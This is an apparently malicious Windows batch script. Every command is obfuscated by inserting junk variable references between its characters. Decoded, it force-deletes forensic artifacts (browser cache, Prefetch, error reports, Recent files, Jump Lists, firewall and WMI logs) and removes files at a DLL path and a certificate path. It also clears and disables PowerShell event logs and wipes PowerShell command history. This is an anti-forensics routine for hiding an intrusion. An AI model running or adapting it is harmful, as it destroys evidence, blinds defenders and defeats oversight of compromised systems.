d%JWjFx%e%FsWmNK%l%MXRkuZoCcd% %APRjr%/%QJKLbuYdWB%s%aB% %QIlIgKWwvk%/%HJXJ%f%qbvucywu% %mOQBdazt%/%aaDp%q%LZNVSCl% %CkkJS%"%L%%LocalAppData%\%NYOZGk%M%meDy%i%KZwf%c%RW%r%DzuTfPhC%o%TwX%s%bC%o%NEreuoyuTK%f%pZk%t%NvYZWWe%\%pSYHD%W%M%i%yFlMWasTaY%n%TqIGiFacoP%d%RJVPuxKAK%o%gQK%w%gQeYnUzRZ%s%jfErwhqXa%\%GokmDWRqfu%I%B%N%hpjnT%e%MUKdGd%t%fdbT%C%pTPEJQENo%a%tNRFBTG%c%RadqU%h%spm%e%sbuolY%\%ND%*%zW%"%xs% %w%>%QuL%n%BGejHlwL%u%ehvOLOCcrA%l%VNh% %Kemvd%2%mBsGr%>%EsF%&%GH%1%aHy%
d%rWE%e%DNzU%l%SWAdggDItq% %Za%/%hPYOyFhQlh%s%aGeDe% %JvyMzHFFxW%/%IFs%f%tiNKpWCEnE% %WnYS%/%p%q%YdCxb% %kG%"%Tt%%WinDir%\%CzuuC%S%p%o%bZdUbIP%f%DnwjtY%t%HdL%w%hZxn%a%mYLI%r%l%e%gtzFpV%D%nOvXA%i%ysOKHxxwRm%s%GtCq%t%tPWntPQLj%r%d%i%ZoETV%b%ctyc%u%BA%t%KouK%i%HzFsMXzpfa%o%YwJyCSkDXH%n%dUQgzCUmj%\%ESp%D%QnmhIVqf%a%nF%t%TdqMtPhOz%a%dySpcyjhDo%s%W%t%nndy%o%wCD%r%xDc%e%zfBSx%\%vvCCNLZDk%L%L%o%qtxke%g%sL%s%ft%\%ABdUKJzsZU%*%qwekh%"%EVstwz% %EborU%>%rp%n%t%u%ZUQJm%l%s% %GZpwhB%2%A%>%NVmi%&%PVryHtqK%1%oXxT%
d%Pi%e%EBEdU%l%lORpgYR% %FjdmVY%/%DXDVZzTLYo%s%f% %gfGqlMXU%/%p%f%f% %uVEJWBkxn%/%zAXYrahHLO%q%xJOr% %LTNbYCu%"%BuxWC%%WinDir%\%fnKzjQB%P%hmD%a%mZTcJghWA%n%JqWTDPnOTV%t%xpQRhPVGN%h%RCqQXtS%e%A%r%nTV%\%pMb%*%qraj%"%hy% %vsTIs%>%NbHLSujCTR%n%qudBN%u%erueYdsg%l%dyY% %arfvQRSf%2%pQbuE%>%tCVhtzkVT%&%zgJvmKnGU%1%MAznGN%
d%UukJaZDAE%e%OHnZmtxip%l%ori% %FMPMari%/%pogNKyCRy%s%FpgMIh% %SmNCiwVG%/%SgPKqnHjqI%f%OeaRy% %F%/%AHQPaTLXiC%q%DMtEQkcqSQ% %NslfkwgER%"%BqRgIVw%%WinDir%\%la%I%oLpDSD%N%KhIYET%F%wZQj%\%oZagXgDF%S%vBpw%e%nqQdQMg%t%wbxErWz%u%kLcjlJ%p%A%a%iuawyLXSbb%p%O%i%VErHjD%.%iObntQt%l%WpZL%o%GiKQuGpHNo%g%lYMPMIN%"%lZSZJT% %gRTpoM%>%SZ%n%jNGPCMWdyY%u%BYGDyYvv%l%BXcwZJZvU% %OkwDWCunq%2%QpOrQPGW%>%VdDOu%&%yDXdpstjsE%1%cJWNvBpSP%
d%xM%e%PnbTh%l%VyRqMqUXMc% %gQsWjvLtH%/%UjYlgNc%s%yExWimYKz% %bvW%/%d%f%esLUaEajZ% %ec%/%HrHY%q%ZvtgwvYXz% %ka%"%de%%WinDir%\%cva%I%EWElNidR%N%tATnJvGMZs%F%AGAGXAbQQc%\%QqPAp%S%R%e%JlOdkj%t%CfK%u%Mfg%p%KVfu%a%QEUlnrAlX%p%eGidMIo%i%PMlzhF%.%L%d%CarN%e%xK%v%YnPMbmEIA%.%eoOPmz%l%HxUgMBN%o%fkOYdqT%g%PKUL%"%VFZfQrrO% %ptoKtg%>%qUnDZwbwE%n%Gv%u%ns%l%vkwneDFw% %NJcE%2%hOApRCuw%>%dyavmUXW%&%xFTCesECtz%1%ejGYeqg%
d%MFmx%e%qcLXFNXvC%l%JiaXIAQJJR% %QWKkTuK%/%j%s%UcaTwT% %wLgl%/%ov%f%CPmqhlc% %jlAhtYcM%/%k%q%TZNEtSmu% %YvKzJAww%"%RmgRUMgyR%%LocalAppData%\%kAQcUfg%M%QDAW%i%UZBB%c%R%r%gH%o%qli%s%HyXmUUDq%o%HsZdtrKIjc%f%lD%t%xtj%\%GDydT%W%nYlvMTGgr%i%sDbjWCySa%n%MBnR%d%qDadFprNS%o%mmxkbRHwV%w%WXiC%s%fLRGvd%\%S%W%EFrBByUDMW%E%T%R%eoLm%\%TmfsMDyzlb%*%oEQOHAKDL%"%LMqsV% %ZPEEtzDV%>%D%n%RoeAgU%u%PjOGOEAA%l%wOxvqcCL% %SqFOzPXUg%2%KdaN%>%ogWbzGE%&%bX%1%U%
d%sIQRhE%e%kqU%l%EhqBT% %seXLE%/%MdR%s%ASsBODV% %v%/%PwZfmfuPfX%f%xYgkRDTaBm% %EjmhvZwgX%/%KAn%q%GkY% %vkCWTiVX%"%gXwJmRJAJ%%ProgramData%\%OaxyEBkc%M%lqpmrBTWWn%i%Wwx%c%UWM%r%UymSf%o%PXmxEDgHbH%s%aRGZYlIt%o%lzzLaONHQq%f%g%t%ATbX%\%ZQWrOyBS%W%lH%i%wD%n%EVVY%d%uaWRZEWN%o%OQLn%w%LrNSv%s%lHW%\%jeYgQIiYOG%W%EfiEuMhH%E%wDRbYquIl%R%PFRzr%\%rokrjopQ%*%R%"%VosOgvNuA% %I%>%PNzeHlfuiP%n%seefzzxco%u%rtCQ%l%cwYoH% %khrMGojy%2%U%>%UKsk%&%a%1%ZxXoJCfJD%
d%WhiiNCDJMJ%e%jOtoDWid%l%jIGdTH% %JW%/%HcqJS%s%mblf% %EcdunO%/%uH%f%vBrXbx% %b%/%MdKA%q%gVH% %QR%"%OGffFqNby%%AppData%\%ooxqJCul%M%dBiNC%i%OrF%c%ThUDev%r%UrSriQ%o%Dd%s%bfgahNHY%o%XuxmMR%f%nVXCp%t%hfEkXT%\%nUe%W%AupDwb%i%MrWZCMgCe%n%GCUDNPQ%d%doEvzuR%o%NTI%w%ozkr%s%CbQow%\%hDvJOAT%R%BddKYid%e%LowLKzURh%c%wcyhDdRx%e%MPzUB%n%tA%t%iwrYiHBwOg%\%iurTovl%*%bdbs%"%YsXZaxL% %H%>%mhBIxdx%n%NsZIiSD%u%znvcnK%l%RpOJYcKKbA% %sxRC%2%JelOddS%>%SmEFDtU%&%gfR%1%zgyoGaMpce%
d%mvgtNg%e%oGPwbXx%l%xlDFGmlzy% %vdFfsDsHU%/%ZWAQf%s%q% %RuxOMV%/%garNldez%f%gGrAzLxIVn% %VmJS%/%GsXUGLtgwF%q%U% %xONy%"%ktsM%%AppData%\%c%R%TQ%o%JfLe%a%L%m%zGl%i%ccrpFMxv%n%sZ%g%KqITJI%\%Id%M%L%i%OIFuVLco%c%oh%r%bZbxZGfpY%o%lehSsfKkOj%s%lOngcrRUcP%o%ywHfDezkxx%f%LYwK%t%OoNE%\%bt%W%DHKcmLtXl%i%KIxLe%n%RBah%d%hVKVC%o%vqz%w%JaVXLii%s%AINVXVcu%\%eqcelrLs%R%fN%e%RlarbH%c%Ks%e%OoPigtGaD%n%Up%t%pEWwO%\%gXlcLy%*%yoURJHmgN%"%OCORuuGL% %RvxreaHWQa%>%lAqtBz%n%LkENPe%u%SRosrI%l%cshkEwVl% %QRXSRgnk%2%wreyAdnL%>%CJdtd%&%b%1%fMH%
d%z%e%HKi%l%lp% %SifMEcFS%/%Gf%s%rI% %gDhQahJa%/%cKLRKqsd%f%uS% %d%/%skxc%q%lRLeGWrAL% %Tz%"%pTYGmEAGg%%AppData%\%QPvpg%M%TMaVrboF%i%C%c%NWoCGV%r%xNqpcujbdv%o%McEJSlq%s%c%o%zWSxPYcDuV%f%sGCQIbinO%t%z%\%Z%W%oBLuB%i%csB%n%qgDALDYAwG%d%Oxeym%o%eDEihJKO%w%u%s%AFM%\%XX%R%kjAGIWYmxX%e%cyp%c%I%e%QQCqGbvi%n%jU%t%kqhJMG%\%tmdTWQH%A%AlwiUAitCU%u%WwSuYiULMo%t%Spy%o%TY%m%JTtHu%a%EFzv%t%TUbzxMV%i%g%c%dZCJFaf%D%hTy%e%nDehU%s%NXiBZdzrhr%t%RpRAQ%i%kU%n%SEaKAafxY%a%vl%t%jqSCosgvb%i%nAXRcdJj%o%cBF%n%aBcIbr%s%VOInIPR%\%PR%*%tpUaW%"%oxsnPlgAR% %w%>%LQRrPMSa%n%plX%u%AfEnzPUgK%l%agB% %GE%2%TRcYcfz%>%qV%&%alVZTcG%1%o%
d%qgqeA%e%DhH%l%xCrzYDDzz% %URXPdbHzh%/%cRtvGMKr%s%vu% %NeQgtlGgvK%/%IARf%f%aCG% %OdW%/%TOrrKN%q%neSstLIyPu% %cKhil%"%UbBVSec%%AppData%\%Ly%M%lYk%i%iSskdI%c%vWekBPStK%r%yTblh%o%ZgQYF%s%NsmOly%o%P%f%UcOR%t%astZ%\%oLx%W%StK%i%s%n%vFSxdtzKx%d%rHtYfEzbY%o%JmfykwWvZ%w%wyTQmNXKJH%s%o%\%nPe%R%BCRMciXPT%e%oBoBGNOSf%c%NULxLvGuW%e%IvWJdUZW%n%AbYFJv%t%izLk%\%En%C%hdkBfJWI%u%dDomnASKj%s%PxGlJVxAdb%t%LQZxbHntAX%o%wMfA%m%aJ%D%ncRskxfaBp%e%ou%s%oKWvouVla%t%xnXg%i%eavvF%n%LjDDOiTVuo%a%WGq%t%zNP%i%crqWp%o%OGGEi%n%j%s%tiok%\%K%*%X%"%rkYAN% %aUQgnyv%>%WGhRQZS%n%xXeI%u%CSGHIj%l%z% %dXDdKdiBiU%2%hJFBMxRKpw%>%TWlAiir%&%YDKgINxzK%1%iABpWj%
d%EQMfTpF%e%KttttQSikH%l%AqdvAWGUF% %S%/%ShxSZKoFwq%s%UYcy% %GhZiqec%/%ILwsMNAg%f%CsquSFHTrI% %M%/%MlFHP%q%NCVYIKr% %qlirvScVF%"%hEDMI%%WinDir%\%uzNNPRjElv%S%cIZQsKBd%y%w%s%dKJpexgO%t%nBViAc%e%hG%m%QzTZ%3%FotctZIpP%2%ZuY%\%vS%L%ZpMPvjzD%o%qdELMO%g%wQkKzNRVAM%F%HN%i%vJ%l%edMcZLn%e%dva%s%julHiHaanD%\%XMQapvGL%F%GbTGS%i%eHz%r%sh%e%ZlCyJxzu%w%Xk%a%mqbHlPvfnR%l%OF%l%tFTx%\%rDwOhRDyeo%*%A%"%YqsOYTvXMv% %CmlrXmZfHL%>%SLJ%n%NlwyAt%u%QdxgYAn%l%EiTDFjXdK% %yap%2%nMKjFzh%>%RmM%&%GNEpgA%1%oZkWmA%
d%o%e%gCDeAKVJFr%l%R% %S%/%JnnxuAOt%s%GLvqgFY% %nc%/%W%f%YAnvMmei% %PDdoEbBH%/%mKEBsfwv%q%rQzLa% %ty%"%wkCIUwtAbl%%WinDir%\%SmXVrzbu%S%jNxK%y%XEcZWcSQG%s%ZWPno%t%xYoYsXNls%e%siBTV%m%DiFf%3%sS%2%xR%\%XXuzHGn%L%cu%o%OQ%g%PRN%F%zcgoYThwhA%i%TYXSuW%l%BvgWWR%e%Ytvf%s%C%\%rIP%W%DpvhHCpE%M%KOdskVZ%I%urFTKgjde%\%PfgaDpU%*%SXNuheBm%"%nFsnPYZ% %vpRRiFexj%>%nY%n%B%u%k%l%ClKxWbtKwq% %rOUuqw%2%KT%>%Aa%&%vU%1%sxlLtBeBu%
d%hId%e%ioFWUDM%l%WibXb% %JcGH%/%Nc%s%HXRYRu% %rKMpckSiq%/%ZxOXcG%f%qhjHsuiSpn% %tkUumIE%/%uc%q%B% %VPW%"%KphseJ%%WinDir%\%P%S%sppO%y%nqa%s%TZiq%t%wy%e%jqmoruaT%m%CiNENQH%3%IYVD%2%Eccn%\%yBzcIO%L%GebCzGehSf%o%QhSvFhhYZ%g%TcDadqUElr%F%DDTSEDLy%i%Vp%l%lihOz%e%miEbPvMp%s%QwBKJqR%\%o%*%lkshsT%"%xP% %pJXGCKfNc%>%yMEBIJM%n%IfzLS%u%PV%l%nWH% %bRzSteltVI%2%dkISrthXuQ%>%oIm%&%ib%1%OEpK%
d%GdU%e%OW%l%m% %gtlCClHzFK%/%hBjXTb%s%YGd% %Tb%/%VYeCjI%f%n% %GsdW%/%HkrXmCwZR%q%pmnkK% %dOLCygPwjQ%"%YVNyRunMQ%%dll_path%"%aYt% %RBjMX%>%gjcTkmMNG%n%saHmaMO%u%Ixn%l%CMIj% %Xa%2%xoPGS%>%HlcRiFEfzl%&%TRNPjOhqF%1%VWokpZ%
d%oIJ%e%Phkmrdo%l%gdRVzTL% %mDJdBVUidG%/%fnpkpDE%s%izoBYr% %eFRD%/%ntlCLXxWNY%f%qluWK% %PimILCKq%/%TXkbCJ%q%PZ% %e%"%HSQHo%%cert_path%"%gacxrMVx% %SbOU%>%YOqwA%n%cKNoxLoiA%u%Sbe%l%SdJRggsh% %xLTN%2%Fg%>%Xqh%&%WWthut%1%PvNoxZPI%

:: ================================
:%ovm%:%Alvv% %xLCpd%=%Yi%=%DyKWFTxdpN%=%CgbK%=%BLJNXRVmA%=%RuxXmK%=%ES%=%U%=%hms%=%FK%=%HCxxRU%=%dnrwiYhy%=%EyoTbDyCbg%=%KePMaS%=%YLOzFLpmOs%=%Y%=%kgQBZrN%=%c%=%futMbPCHH%=%qW%=%TcxUT%=%Ah%=%ZGwmEjaLEF%=%hlLdIIgul%=%pZ%=%lrjJmlKR%=%aGeujEjxT%=%yh%=%qLVCFlBAx%=%KcYd%=%SwDRfcXorO%=%TQfqEDHHj%=%SZSxy%
:: Remove PowerShell Logs + History
:%KkJjLcSmBq%:%s% %h%R%YlkaZlwRgG%e%ZpVtKu%m%U%o%CIusTUSnk%v%myze%e%AsPn% %vJCqsvxu%P%tbkOd%o%e%w%M%e%a%r%P%S%zlOWPiab%h%qMWvqiWKRS%e%InRiK%l%ngI%l%UyKAbMg% %ZVaU%L%qHbMtai%o%YexZAZEYcb%g%gAMMwKXPm%s%nTyrxiuU% %QEZMbHLZxK%+%FCdjLk% %xwZDOlkyJ%H%ZtGvBr%i%xuKnh%s%DDBQHqpPT%t%YcJlVR%o%UeZnPJVL%r%dv%y%hRryPiriO%
:: ================================
:%hnCk%:%rhSbypz% %q%=%IyCp%=%dCvDtarj%=%UU%=%SwOwe%=%tviyfIHb%=%b%=%bBTZfld%=%gzxnYJd%=%lHh%=%cIlYCEJUJj%=%Qu%=%Le%=%ID%=%X%=%dn%=%wEVqhGL%=%poX%=%oKVvHFvgjQ%=%tTmHrQU%=%cteZu%=%SqvSEJIp%=%iaIl%=%EQL%=%eWXBy%=%llDk%=%pPOctBHCW%=%xILQ%=%XEtdnSnRpq%=%qgbD%=%DJUlKpuSv%=%zyy%=%q%
e%PQWCCFF%c%xBvtojeof%h%ytEgXal%o%pUcyVEZE% %IAOY%R%cSNaosvL%e%a%m%rpWc%o%QRMWu%v%HMMj%i%ppqbNrqJ%n%qIrR%g%gXqqEBoR% %iTIZ%P%fkSOheFifR%o%aLhDmdfyDk%w%wHSy%e%E%r%E%S%bNztmEd%h%UHxhdoolt%e%ffvkpHzcP%l%cWzcBmXo%l%ihU% %CHkSDs%L%hDDRFa%o%g%g%woRrKYZpwx%s%zqbgsUWsF%.%Ufqw%.%c%.%RQUAs%

:: PowerShell Event Logs Clear
:%V%:%rUgpcmJK% %PFY%P%IIqlyD%o%aB%w%DXRET%e%IDHZ%r%QvzQEtULiA%S%l%h%Ue%e%OOTD%l%vsPuOz%l%fsIBbF% %UEWJR%E%Dzr%v%uXbcLkGj%e%zbeZDz%n%XxbAdaye%t%CP% %VHRMQidE%L%jgZ%o%cUhQbFz%g%NlC%s%jDk% %cvMuVFVmEC%C%sxKwJ%l%WnQJwHLxqc%e%s%a%InHMrGzTWJ%r%dqOXvMdwfI%
w%oS%e%BFnyFNaBj%v%MnUnWxaqwG%t%TOqZ%u%ovJij%t%r%i%NFtDhc%l%lpfP% %CeFr%c%ab%l%CiLdXzjscj% %jL%"%qz%W%AT%i%YdMCDdl%n%I%d%IoxOp%o%Qq%w%fmtbPlDwdH%s%v% %GMNqdy%P%lJZlhvZOnI%o%pIaT%w%mLfLPNZN%e%jwh%r%aIKu%S%foXVaCXg%h%TbwkCYa%e%U%l%zme%l%ZIewWhQsPg%"%aUdtKXmvCV% %xUCjQFseMu%>%apbQiRRoP%n%snF%u%Ct%l%qSnUTQbW% %LU%2%UFTnYckhpR%>%ovDzd%&%o%1%uVtJz%
w%cOZFNIJ%e%fCQyqvp%v%sJhNeUHXtZ%t%rJBsmimfE%u%CwqzqIg%t%QLTlyf%i%DevjQ%l%lWA% %zCbqEqwXuW%c%aFe%l%EhBeMDVGcP% %lvfwl%"%Hic%M%GIawYQbH%i%OxIoxrV%c%xPlyNSlmZR%r%TqPvvoVdT%o%FuuWMqq%s%gRkm%o%sRqNmDU%f%Z%t%UcQvBkq%-%oidP%W%tRrq%i%GROrf%n%g%d%dCby%o%omdYf%w%vOUdrq%s%TovU%-%GWiepUPNw%P%IIsVsiw%o%YRY%w%v%e%NowjesrgN%r%TFLcTNj%S%FTPrhZAfZ%h%GhAc%e%rtDdnuo%l%cmZmkSjKe%l%GmrqYAEHBn%/%f%O%b%p%TTlVpSBmT%e%dsRwMpn%r%cPtQFZzn%a%kQyQhiCQL%t%wszz%i%sTjkUZw%o%WnXIrR%n%uU%a%lwL%l%ZTmZPMnlOb%"%RVxtZKh% %AHS%>%E%n%FXwm%u%fcC%l%WkA% %mxiitAcGTt%2%BLyPMiIWxb%>%JzVSQF%&%IzKyGQb%1%iceyCaN%
w%ox%e%lyR%v%GWBP%t%prxY%u%qE%t%ETojHSZJlv%i%L%l%kkLRALiv% %QHaaIjzSZl%c%YIAlF%l%APL% %GltbIFkDZC%"%mRnp%M%Ngfl%i%QgnKHCV%c%qBnh%r%G%o%tzbgy%s%JZxB%o%eG%f%eeePlQyGS%t%U%-%nSZHZtT%W%MerciGZybn%i%jfa%n%RCbAAeaL%d%cXCokaoGt%o%twE%w%xQ%s%wPxN%-%kwDhSP%P%HUWIlCgaU%o%c%w%LEEgzf%e%VcyGg%r%aE%S%edjqsssQtR%h%VJCv%e%sQjK%l%FofT%l%kuzqhYkmoH%/%WWfROG%A%wTHKB%d%JdQW%m%lGSBQyEs%i%WjIbJ%n%nLDUOAnaK%"%G% %eW%>%OKcE%n%sPZrEkYYVh%u%tMVgzAzUJ%l%rGCL% %gDvRlMVfhC%2%nOWeSYbN%>%cXuJEjmj%&%GOQcg%1%mgpGQIar%
w%SfhDX%e%LWFLtE%v%kwqJDroUH%t%QKFq%u%VPoP%t%UhqFV%i%XYlwQN%l%Z% %TqQDCumNGy%c%HqRXkfqH%l%tkUvy% %MPUQcvnk%"%TgA%M%bvzxQmBI%i%ll%c%hV%r%xANLuxp%o%UaFkdWjEwK%s%Rpm%o%caUDRga%f%lCVcgq%t%BMp%-%ZA%W%uUAeHoLbg%i%rEQzykHvE%n%P%d%UDlCiRO%o%Bo%w%eTHJU%s%ol%-%te%P%Nxs%o%srzW%w%VqEgsJVetY%e%GO%r%pHDOwyrukY%S%HXvvVC%h%t%e%GqJPw%l%dfnWKKeE%l%mPktXg%-%x%D%iNUUKY%e%uIOzRz%s%D%i%piGhwj%r%SXQGWEJf%e%xvXm%d%udG%S%NoPgNmfRb%t%nuesDeSMSo%a%KQhPNhpMp%t%xURSWQ%e%yYyyq%C%jf%o%GAmwJJNoK%n%PODdq%f%JwQppcb%i%hccD%g%XdwVuOM%u%KzFZnZ%r%nwpea%a%cWnTw%t%YwFjVgov%i%XjxZzKJZ%o%jCY%n%LmVhq%/%dFs%O%gSQzdz%p%nkHiVu%e%mYYG%r%PapViHTbRI%a%HxfwRGe%t%SQGvpli%i%YeHho%o%XXPtjcAbJ%n%pVo%a%H%l%ruw%"%L% %kOg%>%QLY%n%iBtVQS%u%ys%l%ZYUnKbWm% %YvIgKiBiVM%2%gaEedd%>%ICqkkAjwb%&%VGMgwY%1%mAuOHYm%
w%ZqZ%e%jTys%v%UdJwEK%t%h%u%bobOeP%t%XnT%i%Ap%l%rZg% %leNIKFyvh%c%HSRLEmc%l%cXbEkounkg% %Y%"%F%M%ymlLIbnLh%i%WDLOuGDVhB%c%dZUhj%r%NOuSBWH%o%jDj%s%GO%o%cnXqoGK%f%QuS%t%aN%-%hF%W%unNJ%i%mIKWHw%n%paaKWovfo%d%atVfqjC%o%rEzCnnHC%w%ZpLYLu%s%FkKyvnhVA%-%V%W%FO%i%yW%n%LuCx%R%yhVTBoVd%M%oUlSe%/%rB%O%yPkhlPU%p%QyKOCTBIGw%e%GUCgFt%r%AwkexjKZ%a%X%t%ZufSuVMZ%i%MchsBWezBs%o%vHTyIF%n%T%a%iC%l%sX%"%IZMQtQQp% %OLlxUQ%>%PzcxPXVa%n%sYjsTi%u%PeaTGLWc%l%N% %OpBciwGIUC%2%MHfwML%>%ryfyEor%&%W%1%hyMnXRl%
w%VUFCmcTEs%e%x%v%YktOUlW%t%lBPokB%u%QIZ%t%gtjXmno%i%woIdKOzA%l%gkGmU% %h%c%kXGvMtAM%l%kq% %V%"%jBXoRGC%M%zI%i%RsOErBAtI%c%kRfCpRE%r%bvrKRSnzg%o%E%s%catCeAjiKt%o%Ax%f%j%t%vlN%-%Hd%W%MZkQ%i%oTqsEq%n%mzksy%d%XUFyo%o%qTTsL%w%pB%s%bvxeFvVVx%-%xpdfiv%W%svUO%M%k%I%JXENxbVULE%-%QVAbfc%A%Rb%c%c%t%bUfdw%i%cGgWp%v%oV%i%RMUaGjxrVp%t%OkX%y%aN%/%n%O%hhnrsld%p%uhjUtzqJ%e%Opq%r%NBwphXt%a%cuav%t%rtF%i%WieJegP%o%KHkSne%n%ZewCtoPpK%a%yClZfi%l%I%"%uBoCXRjEY% %VjHDgw%>%qQKcmA%n%mCUfqKb%u%LfQHyUq%l%nzPO% %fsk%2%nDdenxN%>%znpA%&%FBPqNqBG%1%Vf%
wevtutil sl "Microsoft-Windows-PowerShell/Analytic" /e:false >nul 2>&1
w%iSQszdrFl%e%WKzTB%v%irj%t%uCpwmQe%u%qhmHMttMMU%t%hBFT%i%mgWzUQL%l%zQTFDJTI% %UkLkJwyZyN%s%vUQjj%l%o% %veK%"%QIDSBihOT%M%yLbBT%i%iR%c%hbnXM%r%STGAaCl%o%i%s%WNVQylM%o%e%f%a%t%wSQpQy%-%W%W%wvFN%i%fiXcBO%n%cLFBGzG%d%BEXn%o%nTTPX%w%m%s%tYU%-%ddRHBSuE%P%gZw%o%eZMjBdCN%w%hJJAilJr%e%xVehzpk%r%mZkA%S%ZtbWBMBpkH%h%OXN%e%PsYZE%l%Vzxj%l%XOuZMqePfW%/%bozGFEq%A%dMxrT%n%EkRAJkky%a%hZlUdU%l%jBKoCavLVJ%y%rwBu%t%DubXUMHFey%i%TavjcXkm%c%Q%"%oTb% %iwxxjFcY%/%nyQaiqmYd%e%qQIeywxU%:%Vj%f%nzLPRHVzW%a%siefa%l%rldTDO%s%HMwwBAoVA%e%mOuyHt% %J%>%clhOMOw%n%sFxuvbNJ%u%sjsGyFvd%l%qJsg% %AQ%2%NpTvipJsh%>%lUjqKZyFgi%&%oaQRuKxIUk%1%HUgaAn%
w%DNYD%e%oTkk%v%ooYi%t%DWdL%u%cB%t%TLU%i%ssOr%l%bycBMpCik% %TXNAa%c%M%l%IQC% %WHwwsroE%"%yhhkVrTEZ%M%yOvXN%i%hbWRTyVS%c%Xl%r%tKYMezrLh%o%HsSg%s%oTpGV%o%leMCk%f%f%t%IYzhnMGWQB%-%LbLAqKC%W%BrER%i%U%n%eD%d%J%o%qfitVbObH%w%pU%s%osN%-%fPVtWZ%P%AktFzYUx%o%eweSTqcs%w%SRzSnSgoS%e%Au%r%SaoWm%S%mMxxrcDSjq%h%uoIxaOj%e%UWN%l%vhRx%l%SBUUFBC%/%bjIkOrFab%A%ThwiMmi%n%G%a%jQZ%l%E%y%DypAAm%t%U%i%vxcnOkc%c%LfXpEziGO%"%uwXOxEJhll% %g%>%dZ%n%aHQn%u%TNfbHycEZ%l%rCDNlq% %KynfrieZX%2%YRsEnf%>%QQlXDHv%&%oMfSJdu%1%RUVg%
wevtutil sl "Microsoft-Windows-PowerShell/Debug" /e:false >nul 2>&1
w%ifjYw%e%gdstRq%v%vV%t%Jpe%u%OFRJPYwOq%t%L%i%BNf%l%ICZXzwE% %QAT%s%lDadfI%l%rtTiR% %YY%"%s%M%GABbXuyc%i%TYUbtMrGv%c%SHYWimB%r%ZYSreUoh%o%CtyOC%s%gQNydoynP%o%ZUHb%f%C%t%bX%-%D%W%xFBq%i%cmoFqRb%n%vJlpCBVL%d%VQqs%o%vUFJSf%w%A%s%Idp%-%i%P%oWdlIAdMkV%o%sBCxNtnz%w%Otl%e%jYAWH%r%EuExvnngo%S%hnLbBfu%h%ZZqXTHT%e%rmveRbbcp%l%IcSidSv%l%lcvaQzsS%/%RfKAjj%D%STYuXh%e%RoyXERitaF%b%xePud%u%x%g%O%"%wY% %ihIy%/%pMuiUnw%e%xO%:%NUg%f%MiOaUCjTDW%a%CyNNZf%l%cvdh%s%kAagey%e%YzfsCbbxoj% %xOoTbAUz%>%vBgxo%n%DSwajKt%u%qnq%l%ztdqviQwPF% %AUK%2%TQoce%>%gqOcreL%&%oZ%1%nrfhmUeeR%
w%jEersnALb%e%mxEUQHlsI%v%zeeME%t%CuSUaUgw%u%lFBnuAor%t%VKMo%i%nLrv%l%bZiEWYgz% %cCn%c%lzMnxFCAab%l%dDzGsy% %Z%"%Lu%M%lUNFYgyec%i%qeQqAuMS%c%Vc%r%wqkPHzwoM%o%UIhz%s%QSndBvR%o%zbmuyDsc%f%YmN%t%eDpZm%-%y%W%XdXfAZw%i%iKEDoasWVJ%n%LoRWeKhH%d%slDKuENMWG%o%imfZKJqcV%w%aXMFMF%s%X%-%zW%P%AoDWQr%o%G%w%aufQ%e%M%r%F%S%RVyApBF%h%OJyXm%e%lvehCEmUGY%l%tlbWBoj%l%AJ%/%CVSLYj%D%Irsd%e%cTfU%b%LTIYGRpE%u%N%g%QbfWIj%"%cYoojatVY% %U%>%owUJTFG%n%DYn%u%qIhVnHV%l%Fgy% %XyJTZr%2%qT%>%tJOCUstE%&%gt%1%JMXBAao%

:: PowerShell History Clear
:%JgQpacX%:%MPizTSo% %U%P%OgRKpz%o%L%w%vfZCRZZl%e%aQIgElbNX%r%WzTIcOFl%S%vcYRJgaxWK%h%NWIHpMkv%e%wNu%l%xl%l%B% %MiKiHryA%H%yiOCLe%i%Ekmg%s%IEKeFa%t%dJpdr%o%YeqDEgl%r%R%y%kZEuiPW% %tUah%C%yBBuuALn%l%B%e%evAqDEFNw%a%AdCd%r%NEYli%
d%jXRG%e%AlAoKTEwR%l%IC% %kUsjBD%/%VVnXQH%s%kAE% %cSmtCXwxh%/%lHl%f%agKHNma% %VjOnFZhR%/%kb%q%aqMSkPAmP% %nc%"%Goj%%UserProfile%\%RlVbVY%A%CVlkS%p%BLUwGOmQzs%p%kxyWFDxN%D%cU%a%Y%t%EDwatHbTyN%a%zma%\%zCtbHec%R%Oxd%o%u%a%NKbhxIqT%m%WcWRTBp%i%uSnWxccpc%n%CbCFZNsz%g%U%\%GPcie%M%YHBFO%i%XE%c%WwbiZ%r%QSxeBohYD%o%tMDPgOknpF%s%XesjgFDqBJ%o%FdfOq%f%een%t%ZgCK%\%cEHcUSZzfz%W%rrvhqHIG%i%UdEqSda%n%SNSEGENip%d%EX%o%VSfr%w%QELZWQY%s%b%\%FVbJY%P%m%o%hWzptvNU%w%avMhWVdzHf%e%cI%r%W%S%xLTqRlA%h%v%e%ROs%l%XWexYokdT%l%Uvbil%\%H%P%suDcees%S%DK%R%ZyJuXdM%e%lvJWACFqFZ%a%p%d%UM%l%rpWe%i%QX%n%zRsoZyy%e%OHF%\%KsuJVBF%C%D%o%Lw%n%lu%s%ofAq%o%vtxodq%l%tZMuDd%e%VPBKGY%H%yviMRPHtC%o%pJeJsoA%s%vWRn%t%XionTDJLEd%_%pEMwmfSy%h%fwuo%i%J%s%xEPtcgUd%t%IQDUXsp%o%fST%r%eCUe%y%tf%.%ew%t%vlAjdAGL%x%aWTHqZ%t%lOgSAwA%"%ZYpffeKI% %Mn%>%zYVQjLq%n%jOi%u%f%l%ts% %I%2%dcjrs%>%JVENXgQW%&%WQ%1%jIpcg%
d%bPV%e%HQN%l%qgJRhQb% %xHuyZ%/%y%s%oUeZJwa% %QlL%/%PelVNaGYyW%f%WG% %Xxjmk%/%GHC%q%eF% %aAbyUJw%"%F%%UserProfile%\%WRueHzcrGr%A%ZI%p%JzCsw%p%pwmdU%D%JRuGAXbUs%a%q%t%uEJkdr%a%oL%\%t%R%tE%o%RnkeWtcU%a%iWBWyOJAqk%m%I%i%G%n%zJa%g%mucQAePf%\%SCVBEQl%M%NvX%i%qMBsT%c%fnQMvMevVH%r%eyH%o%tdnntmh%s%szywYRoiz%o%BKRlF%f%cgQzojBM%t%mJFcpOI%\%aBjG%W%BAjmB%i%Le%n%ILggwzU%d%OLiCy%o%DjCi%w%BhJXwinQ%s%NqStc%\%IT%P%oAKC%o%gbnLOCxTr%w%Y%e%g%r%en%S%RJVsBB%h%HyQSonBcsR%e%WJE%l%JgTLFbj%l%Xrfjfv%\%HQNq%P%N%S%hVejB%R%ekFL%e%rS%a%bRbWllwiNn%d%oDYPxau%l%eElxbfXkh%i%LVVyXiw%n%QddyoKbrp%e%r%\%JEoJ%*%UoOuN%"%DKoAasj% %wyDq%>%wNYe%n%GIkca%u%MHGKTTT%l%MSxC% 